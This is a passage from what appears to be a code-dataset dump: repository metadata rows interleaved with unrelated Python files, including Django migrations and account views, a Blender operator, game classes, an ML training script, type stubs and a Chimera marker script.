MessageCountByMinute.objects.create(project=project, group=group, date=now, times_seen=50)
MessageCountByMinute.objects.create(project=project, group=group2, date=now, times_seen=40)
base_qs = Group.objects.filter(
status=0,
)
results = list(Group.objects.get_accelerated([project.id], base_qs)[:25])
self.assertEquals(results, [group, group2])
class GetChecksumFromEventTest(TestCase):
@mock.patch('sentry.interfaces.Stacktrace.get_composite_hash')
@mock.patch('sentry.interfaces.Http.get_composite_hash')
def test_stacktrace_wins_over_http(self, http_comp_hash, stack_comp_hash):
# this was a regression, and a very important one
http_comp_hash.return_value = ['baz']
stack_comp_hash.return_value = ['foo', 'bar']
event = Event(
data={
'sentry.interfaces.Stacktrace': {
'frames': [{
'lineno': 1,
'filename': 'foo.py',
}],
},
'sentry.interfaces.Http': {
'url': 'http://example.com'
},
},
message='Foo bar',
)
checksum = get_checksum_from_event(event)
stack_comp_hash.assert_called_once_with(interfaces=event.interfaces)
assert not http_comp_hash.called
assert checksum == '3858f62230ac3c915f300c664312c63f'
| [
"dcramer@gmail.com"
] | dcramer@gmail.com |
4b4f8b16ed3a3451ce853106c6e8934456e04fb6 | 13c2639490aa8cc3ecf891ae3422f0e105dd886e | /order/migrations/0002_auto_20210317_0002.py | f7c72217f08e89a7ab5b6c86813708d6998f5039 | [] | no_license | maratovision/rest_api | d32fdfc8d5d8968d2c8ef77aaed05b25d6fa26a0 | b734f3cf1c626f4043dbaa0fa7a6f41ebf9cdcae | refs/heads/main | 2023-04-08T12:54:40.736337 | 2021-04-08T20:24:15 | 2021-04-08T20:24:15 | 356,038,311 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 877 | py | # Generated by Django 3.1.7 on 2021-03-16 18:02
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('order', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Table',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('area', models.CharField(max_length=10)),
('status', models.CharField(choices=[('Reserved', 'Reserved'), ('Empty', 'Empty')], default='Empty', max_length=20)),
],
),
migrations.AlterField(
model_name='order',
name='table',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='order.table'),
),
]
| [
"maratovision@gmail.com"
] | maratovision@gmail.com |
aa8ca750eff2dc9bc48404571caa906b5e430e8d | ca259c70bd7e565fa45cf7e9597251e7bbd8f240 | /menus/Lighting/ImportRig.py | 8d7f775e12661b27003fe7a168840d311f8ef2ba | [] | no_license | gmolinart/blender_pipeline | 6ecd01e8efa02a2b9b8f68ece3e82a35d899c73c | 1a01d78a697c3fc70e6410b46b5138405d4b542c | refs/heads/master | 2023-04-10T04:17:44.349286 | 2021-04-20T11:14:26 | 2021-04-20T11:14:26 | 304,119,928 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,490 | py | import bpy
# from cgl.plugins.blender import Alchemy as lm
class ImportRig(bpy.types.Operator):
"""
This class is required to register a button in blender.
"""
bl_idname = 'object.import_rig'
bl_label = 'Import Rig'
@classmethod
def poll(cls, context):
return context.active_object is not None
def execute(self, context):
run()
return {'FINISHED'}
import bpy
def import_selected_rig():
rig = bpy.context.object
if 'proxy' in rig.name:
object_name = rig.name.replace('_proxy', '')
elif 'rig' in rig.name:
object_name = rig.name.replace('_rig', '')
object = bpy.data.objects[object_name]
action = rig.animation_data
if not action:
print('NO ANIMATION')
object.animation_data_create()
return
else:
action = rig.animation_data.action.name
rig.select_set(False)
object.select_set(True)
bpy.ops.object.duplicates_make_real()
imported_rig_name = '{}_rig'.format(object_name)
return (imported_rig_name, action)
def link_animation(object, action):
imported_rig = bpy.data.objects[object]
action = bpy.data.actions[action]
imported_rig.animation_data_create()
imported_rig.animation_data.action = action
def run():
object, action = import_selected_rig()
print(object, action)
link_animation(object, action)
link_animation(object, action)
# link_animation('MILVIO_rig', 'MILVIO_proxyAction') | [
"gmolinart@gmail.com"
] | gmolinart@gmail.com |
7daec122740e4dd33b266b8e1ae3a1bb2cf663de | a857d1911a118b8aa62ffeaa8f154c8325cdc939 | /toontown/minigame/DivingTreasure.py | fbb219a4caf3e31d142fc374c0c2f6bb0918ff6b | [
"MIT"
] | permissive | DioExtreme/TT-CL-Edition | 761d3463c829ec51f6bd2818a28b667c670c44b6 | 6b85ca8352a57e11f89337e1c381754d45af02ea | refs/heads/main | 2023-06-01T16:37:49.924935 | 2021-06-24T02:25:22 | 2021-06-24T02:25:22 | 379,310,849 | 0 | 0 | MIT | 2021-06-22T15:07:31 | 2021-06-22T15:07:30 | null | UTF-8 | Python | false | false | 1,336 | py | from direct.showbase.DirectObject import DirectObject
from toontown.toonbase.ToontownGlobals import *
from direct.directnotify import DirectNotifyGlobal
from direct.interval.IntervalGlobal import *
import DivingGameGlobals
class DivingTreasure(DirectObject):
def __init__(self, i):
self.treasureNode = render.attachNewNode('treasure')
loadBase = 'phase_4/models/minigames/'
self.chest = loader.loadModel(loadBase + 'treasure.bam')
self.chest.reparentTo(self.treasureNode)
self.chest.setPos(0, 0, -25)
self.chest.setScale(1, 0.7, 1)
self.chestId = i
self.grabbedId = 0
self.moveLerp = Sequence()
self.treasureNode.setScale(0.04)
self.treasureNode.setPos(-15 + 10.0 * i, 0.25, -36.0)
cSphere = CollisionSphere(0.0, 0.0, 0.0, 45)
cSphere.setTangible(0)
name = str(i)
cSphereNode = CollisionNode(name)
cSphereNode.setIntoCollideMask(DivingGameGlobals.CollideMask)
cSphereNode.addSolid(cSphere)
self.chestNode = cSphereNode
self.chestCNP = self.treasureNode.attachNewNode(cSphereNode)
def destroy(self):
self.ignoreAll()
del self.chest
self.moveLerp.finish()
del self.moveLerp
self.treasureNode.removeNode()
del self.treasureNode
| [
"devinhall4@gmail.com"
] | devinhall4@gmail.com |
7fb4bde6fd28390cdae70c8247ed6a32b2200435 | a4da4b0bee0a6ff500283964f506b578de3701c6 | /mva/scripts/dnn_resweights.py | 0a023e653d56d116acf1b45904cba9b5fafd4fea | [] | no_license | kondratyevd/H2MuPurdue | 4ac012562c02acad6751a1e1ecb6fa1c46d832f5 | 2c0632ecf083840743ee6d652bb31e4ddde101e2 | refs/heads/master | 2020-05-14T19:16:46.489982 | 2019-08-25T21:03:17 | 2019-08-25T21:03:17 | 181,926,372 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,051 | py | import os, sys
sys.path.append( os.path.dirname( os.path.dirname( os.path.abspath(__file__) ) ) )
import argparse
from classifier import Framework
from samples.ntuples import *
parser = argparse.ArgumentParser(description='')
parser.add_argument('--out_path', action='store', dest='output_path', help='Output path')
args = parser.parse_args()
c = Framework(outPath=args.output_path)
c.label = "dnn_resweights"
comment = "DNN UCSD resweights"
# change this line for each run
c.add_comment(comment)
print comment
treePath = 'tree'
c.set_tree_path(treePath)
c.set_year("ucsd_inclusive")
c.massWindow = [120,130]
c.multiclass = True
c.dy_label = "DY"
c.top_label = "ttbar"
c.ggh_label = "ggH"
c.vbf_label = "VBF"
##################### Input samples #######################
c.add_category(c.ggh_label, True)
c.add_file_to_category(ucsd_ggh_2016.name, ucsd_ggh_2016.path, ucsd_ggh_2016.xSec, c.ggh_label, False)
c.add_file_to_category(ucsd_ggh_2017.name, ucsd_ggh_2017.path, ucsd_ggh_2017.xSec, c.ggh_label, False)
c.add_file_to_category(ucsd_ggh_2018.name, ucsd_ggh_2018.path, ucsd_ggh_2018.xSec, c.ggh_label, False)
c.add_category(c.vbf_label, True)
c.add_file_to_category(ucsd_vbf_2016.name, ucsd_vbf_2016.path, ucsd_vbf_2016.xSec, c.vbf_label, False)
c.add_file_to_category(ucsd_vbf_2017.name, ucsd_vbf_2017.path, ucsd_vbf_2017.xSec, c.vbf_label, False)
c.add_file_to_category(ucsd_vbf_2018.name, ucsd_vbf_2018.path, ucsd_vbf_2018.xSec, c.vbf_label, False)
c.add_category(c.dy_label, False)
c.add_file_to_category(ucsd_dy_2016.name, ucsd_dy_2016.path, ucsd_dy_2016.xSec, c.dy_label, False)
c.add_file_to_category(ucsd_dy_2017.name, ucsd_dy_2017.path, ucsd_dy_2017.xSec, c.dy_label, False)
c.add_file_to_category(ucsd_dy_2018.name, ucsd_dy_2018.path, ucsd_dy_2018.xSec, c.dy_label, False)
c.add_category(c.top_label, False)
c.add_file_to_category(ucsd_top_2016.name, ucsd_top_2016.path, ucsd_top_2016.xSec, c.top_label, False)
c.add_file_to_category(ucsd_top_2017.name, ucsd_top_2017.path, ucsd_top_2017.xSec, c.top_label, False)
c.add_file_to_category(ucsd_top_2018.name, ucsd_top_2018.path, ucsd_top_2018.xSec, c.top_label, False)
##########################################################
### ------ Raffaele's variables ------ ###
c.add_variable("hmmpt")
c.add_variable("hmmrap")
c.add_variable("hmmthetacs")
c.add_variable("hmmphics")
c.add_variable("met")
c.add_variable("m1ptOverMass")
c.add_variable("m2ptOverMass")
c.add_variable('m1eta')
c.add_variable('m2eta')
c.add_variable("njets")
c.add_variable("nbjets")
c.add_variable("zepen")
c.add_variable("j1pt")
c.add_variable("j2pt")
c.add_variable("j1eta")
c.add_variable("mjj")
c.add_variable("detajj")
c.add_variable("dphijj")
###############################################
c.add_spectator('hmass')
c.add_spectator('hmerr')
c.add_spectator('weight')
c.weigh_by_event(True)
c.add_package("Keras")
c.add_method("model_resweights") # Dropout 0.2
c.train_methods()
print "Training is done: "
print comment
print "Output saved to:"
print c.outPath
| [
"kondratyev.d.95@gmail.com"
] | kondratyev.d.95@gmail.com |
df5831a71a391f87980328438fe5f86926e0ab15 | 878eecba2d3c6be9df9df0e3d1efb305eb2d7bf5 | /manage.py | 8fe753e6b0606bce8e97835f42364119c428cc9e | [] | no_license | tarunkarmakardev/ModernTools-landing-page | dfa7e3beb162a774495d3483754861ba656a5d50 | ddc811fcb6dcf63ec81d065da2a4e041b94868c0 | refs/heads/master | 2023-01-27T16:02:24.272707 | 2020-12-16T05:18:18 | 2020-12-16T05:18:18 | 321,691,506 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 672 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'moderntools_proj.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"tarun.karmakar.dev@gmail.com"
] | tarun.karmakar.dev@gmail.com |
34a44453130cb2d95cedae4a983ee5c515790b86 | ad13583673551857615498b9605d9dcab63bb2c3 | /output/instances/nistData/list/positiveInteger/Schema+Instance/NISTXML-SV-IV-list-positiveInteger-minLength-1-2.py | 715b946fa5159fb0b19af0b0861cf6fa438d9072 | [
"MIT"
] | permissive | tefra/xsdata-w3c-tests | 397180205a735b06170aa188f1f39451d2089815 | 081d0908382a0e0b29c8ee9caca6f1c0e36dd6db | refs/heads/main | 2023-08-03T04:25:37.841917 | 2023-07-29T17:10:13 | 2023-07-30T12:11:13 | 239,622,251 | 2 | 0 | MIT | 2023-07-25T14:19:04 | 2020-02-10T21:59:47 | Python | UTF-8 | Python | false | false | 527 | py | from output.models.nist_data.list_pkg.positive_integer.schema_instance.nistschema_sv_iv_list_positive_integer_min_length_1_xsd.nistschema_sv_iv_list_positive_integer_min_length_1 import NistschemaSvIvListPositiveIntegerMinLength1
obj = NistschemaSvIvListPositiveIntegerMinLength1(
value=[
955456363348331457,
957542655657275468,
957263866322362775,
921363534435668136,
976427824647526163,
941574587237452877,
976854472611424354,
956756856825653725,
]
)
| [
"tsoulloftas@gmail.com"
] | tsoulloftas@gmail.com |
1c9a374e93179c7fbd847ad7da7bc482836d3182 | 08e2ed7fb3a3080c8cdc46cf7e4cbb2a6e60f90a | /src/game_object/components/glow_component.py | c9dcce079c5157b55879ec2957c6c94e19314bc1 | [] | no_license | thydungeonsean/_rainbowmancer | 1630b60983719dde77cd1dea267dd15dde855c38 | cebaf66f5c69f60f8b6c38492f19b8f1e32f73fe | refs/heads/master | 2021-04-28T07:35:06.183408 | 2018-03-19T19:55:47 | 2018-03-19T19:55:47 | 122,226,506 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,819 | py | from game_object_component import GameObjectComponent
from src.enum.hues import *
class GlowComponent(GameObjectComponent):
CYCLE = 24
HALF_CYCLE = CYCLE / 2
def __init__(self, owner, color):
GameObjectComponent.__init__(self, owner)
self.color_component = color
self.pol = 1
self.tick = 0
def run(self):
self.tick += 1
if self.tick >= GlowComponent.CYCLE:
self.tick = 0
self.pol = 1
elif self.tick == GlowComponent.HALF_CYCLE:
self.pol = -1
if self.is_boosted or self.is_vulnerable or self.owner.critical:
self.color_component.request_update()
@property
def color_map(self):
return self.owner.level_map.color_map
@property
def is_boosted(self):
return self.matches_tile_color()
@property
def is_vulnerable(self):
return self.is_opposed_to_tile_color()
@property
def pos(self):
return self.owner.coord.int_position
def matches_tile_color(self):
if self.color_component.hue_id != WHITE_HUE:
return self.color_map.get_tile(self.pos) == self.color_component.hue_id
else:
return False
def is_opposed_to_tile_color(self):
tile_hue = self.color_map.get_tile(self.pos)
object_hue = self.color_component.hue_id
return tile_hue in opposed_hues[object_hue]
def get_critical_flash(self):
if self.color_component.is_generated:
bot = LT_BLACK
top = hue_table[self.color_component.hue_id][max_str]
elif self.color_map.get_tile(self.pos) not in {WHITE_HUE, DARK_HUE}:
bot = LT_BLACK
top = hue_table[self.color_map.get_tile(self.pos)][max_str]
else:
bot = PURE_BLACK
top = GREY_3
return self.interpolate_colors(bot, top, self.get_progress_percentage())
def get_boost_flash(self):
if self.color_component.hue_id in strong_colors:
bot = hue_table[self.color_component.hue_id][max_str]
else:
bot = hue_table[self.color_component.hue_id][3]
top = WHITE
return self.interpolate_colors(bot, top, self.get_progress_percentage())
def get_progress_percentage(self):
if self.pol == 1:
return float(self.tick) / GlowComponent.HALF_CYCLE
else:
diff = self.tick - GlowComponent.HALF_CYCLE
mod = GlowComponent.HALF_CYCLE - diff
return float(mod) / GlowComponent.HALF_CYCLE
def interpolate_colors(self, (br, bg, bb), (tr, tg, tb), percent):
diff_r = int((tr - br) * percent)
diff_g = int((tg - bg) * percent)
diff_b = int((tb - bb) * percent)
return diff_r + br, diff_g + bg, diff_b + bb
| [
"marzecsean@gmail.com"
] | marzecsean@gmail.com |
42daabc1053796acc91a604a7c3bee3508786c64 | 15302e92957f4824aa37b9ae524f36ca99f74b2e | /accounts/views.py | 7db5acd621b1455666a8b8c2ea6a045899d6faab | [] | no_license | extremesystems/Shakal-NG | 4bc76893d1fd486681b6364d4bb306b02e348ce4 | 40b4f5e70feb3f0f5ef4432b273eb09387232d3d | refs/heads/master | 2020-12-25T10:36:34.227509 | 2013-09-22T12:52:34 | 2013-09-22T12:52:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,262 | py | # -*- coding: utf-8 -*-
from datetime import datetime
from time import mktime
from auth_remember import remember_user
from django.conf import settings
from django.contrib.auth import get_user_model
from django.contrib.auth.decorators import login_required
from django.contrib.auth.signals import user_logged_in
from django.contrib.auth.views import login as login_view
from django.contrib.sites.models import get_current_site
from django.core import signing
from django.core.mail import send_mail
from django.core.urlresolvers import reverse, reverse_lazy
from django.http import HttpResponseRedirect
from django.shortcuts import get_object_or_404
from django.template import RequestContext
from django.template.loader import render_to_string
from django.template.response import TemplateResponse
from django.utils import timezone
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext_lazy as _, ugettext
from django.views.generic import RedirectView, UpdateView
from forms import ProfileEditForm, EmailChangeForm
def login(*args, **kwargs):
return login_view(*args, **kwargs)
def profile(request, pk):
user = get_object_or_404(get_user_model(), pk = pk)
user_table = (
{'name': _('user name'), 'value': user.username, 'class': 'nickname'},
{'name': _('full name'), 'value': user.first_name + ' ' + user.last_name, 'class': 'fn'},
{'name': _('signature'), 'value': mark_safe(user.signature), 'class': ''},
{'name': _('linux distribution'), 'value': user.distribution, 'class': 'note'},
{'name': _('year of birth'), 'value': user.year},
)
if user_table[1]['value'] == ' ':
user_table[1]['value'] = ''
if user.display_mail:
email = user.email.replace('@', ' ' + ugettext('ROLLMOP') + ' ').replace('.', ' ' + ugettext('DOT') + ' ')
user_table = user_table + ({'name': _('e-mail'), 'value': email}, )
context = {
'user_table': user_table,
'user_profile': user,
'is_my_profile': request.user == user,
}
return TemplateResponse(request, "registration/profile.html", RequestContext(request, context))
@login_required
def my_profile(request):
return profile(request, request.user.pk)
@login_required
def email_change(request):
if request.method == 'GET':
form = EmailChangeForm(initial = {'email': request.user.email})
else:
form = EmailChangeForm(request.POST)
if form.is_valid():
if form.cleaned_data['email'] == request.user.email:
return HttpResponseRedirect(reverse('auth_my_profile'))
else:
signer = signing.Signer()
email = form.cleaned_data['email']
signed = signer.sign(str(request.user.pk) + '.' + str(int(mktime(timezone.now().timetuple()))) + '.' + email)
context_data = {
'email': signed,
'site': get_current_site(request),
'activate_link': request.build_absolute_uri(reverse('auth_email_change_activate', args = (signed,))),
}
context = RequestContext(request, context_data)
email_subject = render_to_string("registration/email_change_subject.txt", context).rstrip("\n")
email_body = render_to_string("registration/email_change.txt", context)
send_mail(email_subject, email_body, settings.DEFAULT_FROM_EMAIL, [email])
return HttpResponseRedirect(reverse('auth_email_change_done'))
return TemplateResponse(request, "registration/email_change_form.html", {'form': form})
@login_required
def email_change_done(request):
return TemplateResponse(request, "registration/email_change_done.html")
@login_required
def email_change_activate(request, email):
class UserInputError(ValueError):
pass
context = {
'validlink': True,
}
try:
signer = signing.Signer()
email_data = signer.unsign(email)
user_id, timestamp, email = email_data.split('.', 2)
user = get_user_model().objects.get(pk = int(user_id))
if user != request.user:
raise ValueError
time = timezone.make_aware(datetime.utcfromtimestamp(int(timestamp)), timezone = timezone.utc)
if ((timezone.now() - time).days) > 14:
raise UserInputError(_("Link expired."))
if get_user_model().objects.filter(email = email).exclude(pk = user.pk).count() > 0:
raise UserInputError(_("E-mail address is already in use."))
user.email = email
user.save()
except UserInputError as e:
context['validlink'] = False
context['error_message'] = e.message
except (signing.BadSignature, ValueError, get_user_model().DoesNotExist) as e:
context['validlink'] = False
return TemplateResponse(request, "registration/email_change_complete.html", context)
@login_required
def my_profile_edit(request):
return profile_edit(request, request.user.pk)
def profile_edit(request, pk):
user = get_object_or_404(get_user_model(), pk = pk)
return ProfileEditView.as_view()(request, pk = user.pk)
class ProfileEditView(UpdateView):
form_class = ProfileEditForm
model = get_user_model()
template_name = 'registration/profile_change.html'
def get_success_url(self):
return reverse('auth_my_profile')
user_zone = login_required(RedirectView.as_view(url = reverse_lazy('auth_my_profile')))
def remember_user_handle(sender, request, user, **kwargs):
if user.is_authenticated() and request.POST.get('remember_me', False):
remember_user(request, user)
user_logged_in.connect(remember_user_handle, sender = get_user_model())
| [
"miroslav.bendik@gmail.com"
] | miroslav.bendik@gmail.com |
8c52eb808bb173ab14c7a1d035b74b057d83996a | 0e0f90024d09ff67bcc1b6608a52b0f9ea11fcc4 | /1st_100_questions/LargestperimeterTriangle.py | bcd386f5321df704e8c85a7f5374c0c33b6f7ca0 | [] | no_license | newbieeashish/LeetCode_Algo | ffd7122018ad38b890bf96ceb40c75506fb3d3e1 | 3afaaec3c54787e4646d1472d3f6e7188fb6aec5 | refs/heads/master | 2022-12-14T22:38:04.433700 | 2020-09-17T16:42:03 | 2020-09-17T16:42:03 | 288,243,041 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 723 | py | '''
Given an array A of positive lengths, return the largest perimeter of a
triangle with non-zero area, formed from 3 of these lengths.
If it is impossible to form any triangle of non-zero area, return 0.
Example 1:
Input: [2,1,2]
Output: 5
Example 2:
Input: [1,2,1]
Output: 0
Example 3:
Input: [3,2,3,4]
Output: 10
Example 4:
Input: [3,6,2,3]
Output: 8
'''
def LargestPerimeterTriangle(A):
A.sort(reverse=True)
#
i = 0
while i < len(A) - 2:
# check if A[i] >= A[i+1] >= A[i+2] can form a valid triangle
if A[i] < (A[i+1] + A[i+2]):
return(A[i] + A[i+1] + A[i+2])
i += 1
return(0)
print(LargestPerimeterTriangle([3,6,2,3])) | [
"noreply@github.com"
] | newbieeashish.noreply@github.com |
04bf71b28a823eca83b966aba030e7c3bbab0727 | 14373275670c1f3065ce9ae195df142146e2c1a4 | /stubs/influxdb-client/influxdb_client/domain/measurement_schema_list.pyi | c040b8274502414bdf54a289a3329e40f92554ca | [
"Apache-2.0",
"MIT"
] | permissive | sobolevn/typeshed | eb7af17c06a9722f23c337e6b9a4726223155d58 | d63a82640390a9c130e0fe7d409e8b0b836b7c31 | refs/heads/master | 2023-08-04T05:59:29.447015 | 2023-06-14T21:27:53 | 2023-06-14T21:27:53 | 216,265,622 | 2 | 0 | Apache-2.0 | 2022-02-08T10:40:53 | 2019-10-19T20:21:25 | Python | UTF-8 | Python | false | false | 508 | pyi | from _typeshed import Incomplete
class MeasurementSchemaList:
openapi_types: Incomplete
attribute_map: Incomplete
discriminator: Incomplete
def __init__(self, measurement_schemas: Incomplete | None = None) -> None: ...
@property
def measurement_schemas(self): ...
@measurement_schemas.setter
def measurement_schemas(self, measurement_schemas) -> None: ...
def to_dict(self): ...
def to_str(self): ...
def __eq__(self, other): ...
def __ne__(self, other): ...
| [
"noreply@github.com"
] | sobolevn.noreply@github.com |
e4c391d3b6e866523a631ef0612b77f9ee83c8f0 | eefff1251b2807a2a96748f9369336d5cff5622f | /website/apps/cms/plugins/flash/cms_plugins.py | 3a7842ed1e8bb1293ab68e7fb6c85860be311a89 | [] | no_license | tximikel/pinax-satchmo-buildout | 8d669280c5da47315bbfb96d2797a8c7a1d682b5 | 1e2b8d77fdfc538bd3cb483aa0e549af4e952aa1 | refs/heads/master | 2021-01-16T01:27:09.320052 | 2009-09-15T23:36:33 | 2009-09-15T23:36:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 665 | py | from cms.plugin_pool import plugin_pool
from cms.plugin_base import CMSPluginBase
from django.utils.translation import ugettext_lazy as _
from models import Flash
from django.template.loader import render_to_string
from django.utils.safestring import mark_safe
from cms.plugins.flash.forms import FlashForm
class FlashPlugin(CMSPluginBase):
model = Flash
name = _("Flash")
form = FlashForm
render_template = "cms/plugins/flash.html"
def render(self, context, instance, placeholder):
context.update({
'object': instance,
})
return context
plugin_pool.register_plugin(FlashPlugin) | [
"harley@harley-desktop.(none)"
] | harley@harley-desktop.(none) |
5dfadd0ce45da68215a76c87b5ea34b22ff7c046 | 449da7b08bb82654028967aa0fa8efce8b2b10d2 | /adapter/sites/open/blueking/tests/test_utils.py | cb3cafb4a70dfb7eafbd0a1c3739411cac218684 | [] | no_license | sdgdsffdsfff/bk-dop | f1ae15f858f6236405e50e9453554026d2bcfd21 | 97cfac2ba94d67980d837f0b541caae70b68a595 | refs/heads/master | 2023-08-31T22:24:30.616269 | 2021-10-19T17:56:36 | 2021-10-19T17:56:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 829 | py | # -*- coding: utf-8 -*-
from django.test import TestCase
from blueking.component.utils import get_signature
class TestUtils(TestCase):
def test_get_signature(self):
params = {
'method': 'GET',
'path': '/blueking/component/',
'app_secret': 'test',
'params': {'p1': 1, 'p2': 'abc'},
}
signature = get_signature(**params)
self.assertEqual(signature, 'S73XVZx3HvPRcak1z3k7jUkA7FM=')
params = {
'method': 'POST',
'path': '/blueking/component/',
'app_secret': 'test',
'data': {'p1': 1, 'p2': 'abc'},
}
# python3 could sort the dict
signature = get_signature(**params)
self.assertIn(signature, ['qTzporCDYXqaWKuk/MNUXPT3A5U=', 'PnmqLk/8PVpsLHDFkolCQoi5lmg='])
| [
"1297650644@qq.com"
] | 1297650644@qq.com |
14ef745c146208d2df666127b33858c6be7b7e28 | 711756b796d68035dc6a39060515200d1d37a274 | /output_cog_tags/initial_9549.py | 45f1b9acca999586745f601672e163547da344a4 | [] | no_license | batxes/exocyst_scripts | 8b109c279c93dd68c1d55ed64ad3cca93e3c95ca | a6c487d5053b9b67db22c59865e4ef2417e53030 | refs/heads/master | 2020-06-16T20:16:24.840725 | 2016-11-30T16:23:16 | 2016-11-30T16:23:16 | 75,075,164 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,328 | py | import _surface
import chimera
try:
import chimera.runCommand
except:
pass
from VolumePath import markerset as ms
try:
from VolumePath import Marker_Set, Link
new_marker_set=Marker_Set
except:
from VolumePath import volume_path_dialog
d= volume_path_dialog(True)
new_marker_set= d.new_marker_set
marker_sets={}
surf_sets={}
if "Cog1_Anch" not in marker_sets:
s=new_marker_set('Cog1_Anch')
marker_sets["Cog1_Anch"]=s
s= marker_sets["Cog1_Anch"]
mark=s.place_marker((126, 38, 103), (0, 0, 1), 21.9005)
if "Cog2_GFPN" not in marker_sets:
s=new_marker_set('Cog2_GFPN')
marker_sets["Cog2_GFPN"]=s
s= marker_sets["Cog2_GFPN"]
mark=s.place_marker((591, 364, 713), (1, 0.5, 0), 21.9005)
if "Cog2_GFPC" not in marker_sets:
s=new_marker_set('Cog2_GFPC')
marker_sets["Cog2_GFPC"]=s
s= marker_sets["Cog2_GFPC"]
mark=s.place_marker((858, 422, 729), (1, 0.5, 0), 21.9005)
if "Cog2_Anch" not in marker_sets:
s=new_marker_set('Cog2_Anch')
marker_sets["Cog2_Anch"]=s
s= marker_sets["Cog2_Anch"]
mark=s.place_marker((810, 97, 293), (1, 0.5, 0), 21.9005)
if "Cog3_GFPN" not in marker_sets:
s=new_marker_set('Cog3_GFPN')
marker_sets["Cog3_GFPN"]=s
s= marker_sets["Cog3_GFPN"]
mark=s.place_marker((825, 997, 101), (1, 0.87, 0), 21.9005)
if "Cog3_GFPC" not in marker_sets:
s=new_marker_set('Cog3_GFPC')
marker_sets["Cog3_GFPC"]=s
s= marker_sets["Cog3_GFPC"]
mark=s.place_marker((938, 390, 276), (1, 0.87, 0), 21.9005)
if "Cog3_Anch" not in marker_sets:
s=new_marker_set('Cog3_Anch')
marker_sets["Cog3_Anch"]=s
s= marker_sets["Cog3_Anch"]
mark=s.place_marker((643, 164, 956), (1, 0.87, 0), 21.9005)
if "Cog4_GFPN" not in marker_sets:
s=new_marker_set('Cog4_GFPN')
marker_sets["Cog4_GFPN"]=s
s= marker_sets["Cog4_GFPN"]
mark=s.place_marker((127, 77, 956), (0.97, 0.51, 0.75), 21.9005)
if "Cog4_GFPC" not in marker_sets:
s=new_marker_set('Cog4_GFPC')
marker_sets["Cog4_GFPC"]=s
s= marker_sets["Cog4_GFPC"]
mark=s.place_marker((289, 389, 770), (0.97, 0.51, 0.75), 21.9005)
if "Cog4_Anch" not in marker_sets:
s=new_marker_set('Cog4_Anch')
marker_sets["Cog4_Anch"]=s
s= marker_sets["Cog4_Anch"]
mark=s.place_marker((207, 852, 717), (0.97, 0.51, 0.75), 21.9005)
if "Cog5_GFPN" not in marker_sets:
s=new_marker_set('Cog5_GFPN')
marker_sets["Cog5_GFPN"]=s
s= marker_sets["Cog5_GFPN"]
mark=s.place_marker((614, 524, 34), (0.39, 0.31, 0.14), 21.9005)
if "Cog5_GFPC" not in marker_sets:
s=new_marker_set('Cog5_GFPC')
marker_sets["Cog5_GFPC"]=s
s= marker_sets["Cog5_GFPC"]
mark=s.place_marker((8, 47, 666), (0.39, 0.31, 0.14), 21.9005)
if "Cog5_Anch" not in marker_sets:
s=new_marker_set('Cog5_Anch')
marker_sets["Cog5_Anch"]=s
s= marker_sets["Cog5_Anch"]
mark=s.place_marker((493, 644, 706), (0.39, 0.31, 0.14), 21.9005)
if "Cog6_GFPN" not in marker_sets:
s=new_marker_set('Cog6_GFPN')
marker_sets["Cog6_GFPN"]=s
s= marker_sets["Cog6_GFPN"]
mark=s.place_marker((809, 721, 927), (0.6, 0.31, 0.64), 21.9005)
if "Cog6_GFPC" not in marker_sets:
s=new_marker_set('Cog6_GFPC')
marker_sets["Cog6_GFPC"]=s
s= marker_sets["Cog6_GFPC"]
mark=s.place_marker((652, 818, 12), (0.6, 0.31, 0.64), 21.9005)
if "Cog6_Anch" not in marker_sets:
s=new_marker_set('Cog6_Anch')
marker_sets["Cog6_Anch"]=s
s= marker_sets["Cog6_Anch"]
mark=s.place_marker((954, 392, 878), (0.6, 0.31, 0.64), 21.9005)
if "Cog7_GFPN" not in marker_sets:
s=new_marker_set('Cog7_GFPN')
marker_sets["Cog7_GFPN"]=s
s= marker_sets["Cog7_GFPN"]
mark=s.place_marker((50, 511, 573), (0.89, 0.1, 0.1), 21.9005)
if "Cog7_GFPC" not in marker_sets:
s=new_marker_set('Cog7_GFPC')
marker_sets["Cog7_GFPC"]=s
s= marker_sets["Cog7_GFPC"]
mark=s.place_marker((120, 516, 982), (0.89, 0.1, 0.1), 21.9005)
if "Cog7_Anch" not in marker_sets:
s=new_marker_set('Cog7_Anch')
marker_sets["Cog7_Anch"]=s
s= marker_sets["Cog7_Anch"]
mark=s.place_marker((885, 733, 538), (0.89, 0.1, 0.1), 21.9005)
if "Cog8_GFPC" not in marker_sets:
s=new_marker_set('Cog8_GFPC')
marker_sets["Cog8_GFPC"]=s
s= marker_sets["Cog8_GFPC"]
mark=s.place_marker((880, 949, 627), (0.3, 0.69, 0.29), 21.9005)
if "Cog8_Anch" not in marker_sets:
s=new_marker_set('Cog8_Anch')
marker_sets["Cog8_Anch"]=s
s= marker_sets["Cog8_Anch"]
mark=s.place_marker((838, 343, 909), (0.3, 0.69, 0.29), 21.9005)
for k in surf_sets.keys():
chimera.openModels.add([surf_sets[k]])
| [
"batxes@gmail.com"
] | batxes@gmail.com |
